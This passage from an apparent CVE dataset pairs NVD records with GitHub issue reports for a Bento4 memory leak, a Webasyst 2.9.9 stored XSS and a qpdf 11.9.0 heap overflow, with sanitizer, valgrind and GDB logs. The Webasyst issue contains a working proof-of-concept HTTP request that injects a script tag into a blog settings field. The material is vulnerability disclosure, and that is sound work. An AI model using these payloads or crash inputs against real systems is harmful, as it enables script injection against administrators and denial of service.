#1 0x55cf6eca3029 in AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4Movie.cpp:114:28
Indirect leak of 40 byte(s) in 1 object(s) allocated from:
#0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049)
#1 0x55cf6eca3029 in AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4Movie.cpp:114:28
#2 0x55cf6ec9aa78 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4File.cpp:78:5
#3 0x55cf6ec89c8e in main /home/ubuntu/lab/Bento4_AFL/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22
#4 0x7f3f8e9ddd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
SUMMARY: AddressSanitizer: 416 byte(s) leaked in 8 allocation(s).
```
* stderr (valgrind)
```
==8898== Memcheck, a memory error detector
==8898== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==8898== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info
==8898== Command: ./mp42aac /home/ubuntu/lab/Bento4/crashes/id_000006,sig_06,src_000004,time_55114263,execs_1191083,op_flip1,pos_1217 out
==8898==
ERROR: no audio track found
==8898==
==8898== HEAP SUMMARY:
==8898== in use at exit: 888 bytes in 9 blocks
==8898== total heap usage: 200 allocs, 191 frees, 93,975 bytes allocated
==8898==
==8898== 48 bytes in 1 blocks are indirectly lost in loss record 1 of 6
==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==8898== by 0x192D1E: AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x193178: AP4_FileByteStream::Create(char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x16FE68: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898==
==8898== 48 bytes in 2 blocks are indirectly lost in loss record 2 of 6
==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==8898== by 0x175298: AP4_List<AP4_Track>::Add(AP4_Track*) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x174AED: AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x172FC7: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898==
==8898== 80 bytes in 2 blocks are indirectly lost in loss record 3 of 6
==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==8898== by 0x174AB8: AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x172FC7: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898==
==8898== 176 bytes in 2 blocks are indirectly lost in loss record 4 of 6
==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==8898== by 0x184E1D: AP4_Track::AP4_Track(AP4_TrakAtom&, AP4_ByteStream&, unsigned int) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x174AD2: AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x172FC7: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898==
==8898== 416 (64 direct, 352 indirect) bytes in 1 blocks are definitely lost in loss record 5 of 6
==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==8898== by 0x172FAD: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898==
==8898== 472 bytes in 1 blocks are still reachable in loss record 6 of 6
==8898== at 0x4848899: malloc (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==8898== by 0x4B2C64D: __fopen_internal (iofopen.c:65)
==8898== by 0x4B2C64D: fopen@@GLIBC_2.2.5 (iofopen.c:86)
==8898== by 0x192B2A: fopen_s(_IO_FILE**, char const*, char const*) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x192C58: AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x193178: AP4_FileByteStream::Create(char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898== by 0x16FE68: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac)
==8898==
==8898== LEAK SUMMARY:
==8898== definitely lost: 64 bytes in 1 blocks
==8898== indirectly lost: 352 bytes in 7 blocks
==8898== possibly lost: 0 bytes in 0 blocks
==8898== still reachable: 472 bytes in 1 blocks
==8898== suppressed: 0 bytes in 0 blocks
==8898==
==8898== For lists of detected and suppressed errors, rerun with: -s
==8898== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
```
### Analysis
https://github.com/axiomatic-systems/Bento4/blob/1529b83f89d52958b811469fc3ac5206639a3d0f/Source/C%2B%2B/Core/Ap4Movie.cpp#L117-L123
On `AP4_Movie::AP4_Movie`, parsing tracks and added into m_Tracks list, but it seems that mp42aac cannot correctly delete when we got an `no audio track found` error. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted mp4 file.
| Memory leaks in mp42aac on adding / deleting AP4_Track::AP4_Tracks | https://api.github.com/repos/axiomatic-systems/Bento4/issues/919/comments | 1 | 2024-01-13T21:23:38Z | 2024-02-21T22:47:29Z | https://github.com/axiomatic-systems/Bento4/issues/919 | 2,080,480,764 | 919 | 6,000 |
CVE-2024-27517 | 2024-02-29T01:44:20.180 | Webasyst 2.9.9 has a Cross-Site Scripting (XSS) vulnerability, Attackers can create blogs containing malicious code after gaining blog permissions. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/webasyst/webasyst-framework/issues/377"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/webasyst/webasyst-framework/issues/377"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webasyst:webasyst:2.9.9:*:*:*:*:*:*:*",
"matchCriteriaId": "89182418-CDDF-40D0-B2FD-683C1AD2CDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/webasyst/webasyst-framework/issues/377 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"webasyst",
"webasyst-framework"
] | ### **Summary**
Webasyst 2.9.9 has a storage XSS vulnerability,Attackers can create blogs containing malicious code after gaining blog permissions, and even administrators only need to open the page of the blog management function (instead of the specified blog) to be triggered!
### **Details**

As you can see, `$icon_uri` is not filtered in blogHelper.class.php and is concatenated directly into the i tag.

We can close the previous i label by `"` and `>`.

### **Proof of Concept (POC)**
```
POST /index.php/webasyst/blog/?action=settings&blog=0&module=blog HTTP/1.1
Host: 192.168.160.147:7788
Content-Length: 281
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.160.147:7788
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ti4lm4h4iknp715h4rss5u7g5s
Connection: close
_csrf=65d5ccde9cbb81.61575047&new_route_setup=1&route_domain=192.168.160.147:7788&route_enabled=1&settings[color]=b-gray&settings[icon]=blog&settings[icon_url]=http://bbb.com/\"><ScRiPt>alert(9978)</ScRiPt>&settings[name]=test&settings[status]=on&settings[url]=hebing123hacked
```
When testing, remember to change the `_csrf` and `Cookie` Header in the POC to the corresponding values.
### **Impact**
Create permissions to create malicious attackers hold blog blog, blog management function will be affected, the administrator will trigger open http://ip:port/index.php/webasyst/blog/ (0-click). | Webasyst 2.9.9 has a storage XSS vulnerability | https://api.github.com/repos/webasyst/webasyst-framework/issues/377/comments | 0 | 2024-02-21T10:56:22Z | 2024-03-11T06:15:36Z | https://github.com/webasyst/webasyst-framework/issues/377 | 2,146,455,734 | 377 | 6,001 |
CVE-2024-24246 | 2024-02-29T20:15:41.407 | Heap Buffer Overflow vulnerability in qpdf 11.9.0 allows attackers to crash the application via the std::__shared_count() function at /bits/shared_ptr_base.h. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/qpdf/qpdf/issues/1123"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4WLK6ICPJUMOJNHZQWXAA5MPXG5JHZZL/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FX3D3YCNS6CQL3774OFUROLP3EM25ILC/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U3N6TULMEYVCLXO47Y5W4VWCJMSB72CB/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/qpdf/qpdf/issues/1123"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4WLK6ICPJUMOJNHZQWXAA5MPXG5JHZZL/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FX3D3YCNS6CQL3774OFUROLP3EM25ILC/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U3N6TULMEYVCLXO47Y5W4VWCJMSB72CB/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:qpdf_project:qpdf:11.9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E8567C78-2FB2-4365-9A94-F2E2B896AAB7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*",
"matchCriteriaId": "CC559B26-5DFC-4B7A-A27C-B77DE755DFF9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*",
"matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:40:*:*:*:*:*:*:*",
"matchCriteriaId": "CA277A6C-83EC-4536-9125-97B84C4FAF59",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/qpdf/qpdf/issues/1123 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"qpdf",
"qpdf"
] | ### Description
I found a heap-buffer-overflow crash when I use this instruction:
```shell
/qpdf/build/qpdf/qpdf --json-input POC_qpdf11-9-0_heap-buffer-overflow output_json.pdf
#Changed the name of id:000002,sig:11,src:001030+000958,time:17469012,execs:8722360,op:splice,rep:15 to POC_qpdf11-9-0_heap-buffer-overflow
```
### Version
```shell
chen@DESKTOP-9AK26R1:~/qpdf2/crashes$ /home/chen/qpdf2/qpdf/build/qpdf/qpdf --version
qpdf version 11.9.0
Run qpdf --copyright to see copyright and license information.
```
### Reference
https://github.com/qpdf/qpdf
### **Actual Behavior**
heap-buffer-overflow
### PoC
https://github.com/Crspidey/my-poc/blob/main/POC_qpdf11-9-0_heap-buffer-overflow
### Reproduction
```shell
git clone https://github.com/qpdf/qpdf
cd qpdf
./build-scripts/build-linux
#Modified the instruction to add ASAN.
#cmake -S . -B build -DCI_MODE=1 -DCMAKE_BUILD_TYPE=RelWithDebInfo \
# -DREQUIRE_CRYPTO_OPENSSL=1 -DREQUIRE_CRYPTO_GNUTLS=1 \
# -DCMAKE_C_FLAGS="${CMAKE_C_FLAGS} -fsanitize=address" \
# -DCMAKE_CXX_FLAGS="${CMAKE_CXX_FLAGS} -fsanitize=address" \
```
### ASAN Log
```shell
chen@DESKTOP-9AK26R1:~/qpdf2/crashes$ /home/chen/qpdf2/qpdf/build/qpdf/qpdf --json-input id:000002,sig:11,src:001030+000958,time:17469012,execs:8722360,op:splice,rep:15 output_json.pdf
WARNING: id:000002,sig:11,src:001030+000958,time:17469012,execs:8722360,op:splice,rep:15 (obj:3 0 R, offset 738): "stream.data" must be a string
=================================================================
==3736095==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000d2d8 at pc 0x7f929f1e4327 bp 0x7ffc280f2ac0 sp 0x7ffc280f2ab0
READ of size 8 at 0x60600000d2d8 thread T0
#0 0x7f929f1e4326 in std::__shared_count<(__gnu_cxx::_Lock_policy)2>::~__shared_count() /usr/include/c++/11/bits/shared_ptr_base.h:704
#1 0x7f929f1e4326 in std::__shared_ptr<QPDFObject, (__gnu_cxx::_Lock_policy)2>::~__shared_ptr() /usr/include/c++/11/bits/shared_ptr_base.h:1154
#2 0x7f929f1e4326 in std::shared_ptr<QPDFObject>::~shared_ptr() /usr/include/c++/11/bits/shared_ptr.h:122
#3 0x7f929f1e4326 in QPDFObjectHandle::~QPDFObjectHandle() /home/chen/qpdf2/qpdf/include/qpdf/QPDFObjectHandle.hh:64
#4 0x7f929f1e4326 in void __gnu_cxx::new_allocator<QPDFObjectHandle>::destroy<QPDFObjectHandle>(QPDFObjectHandle*) /usr/include/c++/11/ext/new_allocator.h:168
#5 0x7f929f1e4326 in void std::allocator_traits<std::allocator<QPDFObjectHandle> >::destroy<QPDFObjectHandle>(std::allocator<QPDFObjectHandle>&, QPDFObjectHandle*) /usr/include/c++/11/bits/alloc_traits.h:535
#6 0x7f929f1e4326 in std::vector<QPDFObjectHandle, std::allocator<QPDFObjectHandle> >::pop_back() /usr/include/c++/11/bits/stl_vector.h:1229
#7 0x7f929f1e4326 in QPDF::JSONReactor::containerEnd(JSON const&) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:419
#8 0x7f929ec79cf2 in handleToken /home/chen/qpdf2/qpdf/libqpdf/JSON.cc:1188
#9 0x7f929ec7c96f in parse /home/chen/qpdf2/qpdf/libqpdf/JSON.cc:1335
#10 0x7f929ec7d1c6 in JSON::parse(InputSource&, JSON::Reactor*) /home/chen/qpdf2/qpdf/libqpdf/JSON.cc:1352
#11 0x7f929f1f5e32 in QPDF::importJSON(std::shared_ptr<InputSource>, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:806
#12 0x7f929f1f6d34 in QPDF::createFromJSON(std::shared_ptr<InputSource>) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:786
#13 0x7f929f1fb3e3 in QPDF::createFromJSON(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:779
#14 0x7f929ee8deba in QPDFJob::doProcessOnce(std::unique_ptr<QPDF, std::default_delete<QPDF> >&, std::function<void (QPDF*, char const*)>, char const*, bool, bool, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:1725
#15 0x7f929ee8e73e in QPDFJob::doProcess(std::unique_ptr<QPDF, std::default_delete<QPDF> >&, std::function<void (QPDF*, char const*)>, char const*, bool, bool, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:1763
#16 0x7f929ee90383 in QPDFJob::processFile(std::unique_ptr<QPDF, std::default_delete<QPDF> >&, char const*, char const*, bool, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:1819
#17 0x7f929eefbcb3 in QPDFJob::createQPDF() /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:434
#18 0x7f929ef081d9 in QPDFJob::run() /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:516
#19 0x55dff954ba51 in realmain(int, char**) /home/chen/qpdf2/qpdf/qpdf/qpdf.cc:36
#20 0x7f929e5cdd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#21 0x7f929e5cde3f in __libc_start_main_impl ../csu/libc-start.c:392
#22 0x55dff954b884 in _start (/home/chen/qpdf2/qpdf/build/qpdf/qpdf+0x2884)
0x60600000d2d8 is located 8 bytes to the left of 64-byte region [0x60600000d2e0,0x60600000d320)
allocated by thread T0 here:
#0 0x7f929f5c91e7 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:99
#1 0x7f929ed5361a in __gnu_cxx::new_allocator<QPDFObjectHandle>::allocate(unsigned long, void const*) /usr/include/c++/11/ext/new_allocator.h:127
#2 0x7f929ed5361a in std::allocator_traits<std::allocator<QPDFObjectHandle> >::allocate(std::allocator<QPDFObjectHandle>&, unsigned long) /usr/include/c++/11/bits/alloc_traits.h:464
#3 0x7f929ed5361a in std::_Vector_base<QPDFObjectHandle, std::allocator<QPDFObjectHandle> >::_M_allocate(unsigned long) /usr/include/c++/11/bits/stl_vector.h:346
#4 0x7f929ed5361a in void std::vector<QPDFObjectHandle, std::allocator<QPDFObjectHandle> >::_M_realloc_insert<QPDFObjectHandle const&>(__gnu_cxx::__normal_iterator<QPDFObjectHandle*, std::vector<QPDFObjectHandle, std::allocator<QPDFObjectHandle> > >, QPDFObjectHandle const&) /usr/include/c++/11/bits/vector.tcc:440
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/include/c++/11/bits/shared_ptr_base.h:704 in std::__shared_count<(__gnu_cxx::_Lock_policy)2>::~__shared_count()
Shadow bytes around the buggy address:
0x0c0c7fff9a00: 00 00 02 fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0c7fff9a10: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
0x0c0c7fff9a20: fd fd fd fd fd fd fd fd fa fa fa fa 00 00 00 00
0x0c0c7fff9a30: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0c7fff9a40: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
=>0x0c0c7fff9a50: fd fd fd fd fd fd fd fd fa fa fa[fa]00 00 00 00
0x0c0c7fff9a60: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0c7fff9a70: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
0x0c0c7fff9a80: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
0x0c0c7fff9a90: 00 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3736095==ABORTING
```
### GDB log
```shell
(gdb) set args --json-input id:000002,sig:11,src:001030+000958,time:17469012,execs:8722360,op:splice,rep:15 output_json.pdf
(gdb) run
Starting program: /home/chen/qpdf2/qpdf/build/qpdf/qpdf --json-input id:000002,sig:11,src:001030+000958,time:17469012,execs:8722360,op:splice,rep:15 output_json.pdf
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: id:000002,sig:11,src:001030+000958,time:17469012,execs:8722360,op:splice,rep:15 (obj:3 0 R, offset 738): "stream.data" must be a string
=================================================================
==3736122==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000d2d8 at pc 0x7ffff7297327 bp 0x7fffffff7740 sp 0x7fffffff7730
READ of size 8 at 0x60600000d2d8 thread T0
#0 0x7ffff7297326 in std::__shared_count<(__gnu_cxx::_Lock_policy)2>::~__shared_count() /usr/include/c++/11/bits/shared_ptr_base.h:704
#1 0x7ffff7297326 in std::__shared_ptr<QPDFObject, (__gnu_cxx::_Lock_policy)2>::~__shared_ptr() /usr/include/c++/11/bits/shared_ptr_base.h:1154
#2 0x7ffff7297326 in std::shared_ptr<QPDFObject>::~shared_ptr() /usr/include/c++/11/bits/shared_ptr.h:122
#3 0x7ffff7297326 in QPDFObjectHandle::~QPDFObjectHandle() /home/chen/qpdf2/qpdf/include/qpdf/QPDFObjectHandle.hh:64
#4 0x7ffff7297326 in void __gnu_cxx::new_allocator<QPDFObjectHandle>::destroy<QPDFObjectHandle>(QPDFObjectHandle*) /usr/include/c++/11/ext/new_allocator.h:168
#5 0x7ffff7297326 in void std::allocator_traits<std::allocator<QPDFObjectHandle> >::destroy<QPDFObjectHandle>(std::allocator<QPDFObjectHandle>&, QPDFObjectHandle*) /usr/include/c++/11/bits/alloc_traits.h:535
#6 0x7ffff7297326 in std::vector<QPDFObjectHandle, std::allocator<QPDFObjectHandle> >::pop_back() /usr/include/c++/11/bits/stl_vector.h:1229
#7 0x7ffff7297326 in QPDF::JSONReactor::containerEnd(JSON const&) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:419
#8 0x7ffff6d2ccf2 in handleToken /home/chen/qpdf2/qpdf/libqpdf/JSON.cc:1188
#9 0x7ffff6d2f96f in parse /home/chen/qpdf2/qpdf/libqpdf/JSON.cc:1335
#10 0x7ffff6d301c6 in JSON::parse(InputSource&, JSON::Reactor*) /home/chen/qpdf2/qpdf/libqpdf/JSON.cc:1352
#11 0x7ffff72a8e32 in QPDF::importJSON(std::shared_ptr<InputSource>, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:806
#12 0x7ffff72a9d34 in QPDF::createFromJSON(std::shared_ptr<InputSource>) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:786
#13 0x7ffff72ae3e3 in QPDF::createFromJSON(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/chen/qpdf2/qpdf/libqpdf/QPDF_json.cc:779
#14 0x7ffff6f40eba in QPDFJob::doProcessOnce(std::unique_ptr<QPDF, std::default_delete<QPDF> >&, std::function<void (QPDF*, char const*)>, char const*, bool, bool, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:1725
#15 0x7ffff6f4173e in QPDFJob::doProcess(std::unique_ptr<QPDF, std::default_delete<QPDF> >&, std::function<void (QPDF*, char const*)>, char const*, bool, bool, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:1763
#16 0x7ffff6f43383 in QPDFJob::processFile(std::unique_ptr<QPDF, std::default_delete<QPDF> >&, char const*, char const*, bool, bool) /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:1819
#17 0x7ffff6faecb3 in QPDFJob::createQPDF() /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:434
#18 0x7ffff6fbb1d9 in QPDFJob::run() /home/chen/qpdf2/qpdf/libqpdf/QPDFJob.cc:516
#19 0x555555556a51 in realmain(int, char**) /home/chen/qpdf2/qpdf/qpdf/qpdf.cc:36
#20 0x7ffff6680d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#21 0x7ffff6680e3f in __libc_start_main_impl ../csu/libc-start.c:392
#22 0x555555556884 in _start (/home/chen/qpdf2/qpdf/build/qpdf/qpdf+0x2884)
0x60600000d2d8 is located 8 bytes to the left of 64-byte region [0x60600000d2e0,0x60600000d320)
allocated by thread T0 here:
#0 0x7ffff767c1e7 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:99
#1 0x7ffff6e0661a in __gnu_cxx::new_allocator<QPDFObjectHandle>::allocate(unsigned long, void const*) /usr/include/c++/11/ext/new_allocator.h:127
